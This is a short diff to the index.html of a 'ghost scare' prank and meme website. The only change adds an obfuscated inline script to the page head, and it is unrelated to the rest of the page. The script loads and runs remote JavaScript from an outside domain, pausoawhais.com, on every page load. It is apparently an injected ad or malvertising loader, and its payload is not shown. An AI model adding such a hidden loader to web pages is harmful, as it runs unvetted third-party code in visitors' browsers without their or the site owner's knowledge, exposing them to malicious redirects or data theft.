--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+        <script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('pausoawhais.com',8483697,document.createElement('script'))</script>
     <meta name="description" content="Funny ghost scares, ghost scare memes, ghost scare troll games, ghost scare video clips, and many interesting things about the world of ghost scares!">
     <meta name="keywords" content="ghost scare, ghost scare game, ghost scare meme, ghost scare video, ghost scare clip, ghost scare troll, ghost scare website, ghost scare link, ghost scare game">
     <meta name="author" content="Ghost Scare Team">
